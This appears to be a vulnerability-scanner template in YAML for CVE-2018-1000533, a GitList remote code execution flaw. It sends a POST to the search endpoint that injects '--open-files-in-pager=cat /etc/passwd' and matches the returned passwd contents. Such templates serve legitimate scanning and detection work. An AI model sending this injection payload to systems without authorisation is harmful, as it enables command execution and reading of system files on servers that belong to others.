40 lines
1.1 KiB
YAML
40 lines
1.1 KiB
YAML
id: CVE-2018-1000533
|
|
|
|
info:
|
|
name: GitList < 0.6.0 RCE
|
|
author: pikpikcu
|
|
severity: critical
|
|
description: klaussilveira GitList version <= 0.6 contains a Passing incorrectly sanitized input to system function vulnerability in `searchTree` function that can result in Execute any code as PHP user.
|
|
reference: https://github.com/vulhub/vulhub/tree/master/gitlist/CVE-2018-1000533
|
|
tags: rce,git,cve,cve2018,gitlist
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
GET / HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
- |
|
|
POST /{{path}}/tree/a/search HTTP/1.1
|
|
Host: {{Hostname}}
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
|
|
Content-Length: 45
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
query=--open-files-in-pager=cat%20/etc/passwd
|
|
|
|
extractors:
|
|
- type: regex
|
|
name: path
|
|
group: 1
|
|
internal: true
|
|
part: body
|
|
regex:
|
|
- '<span class="name">(.*?)</span>'
|
|
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "root:/root:/bin/bash"
|
|
part: body
|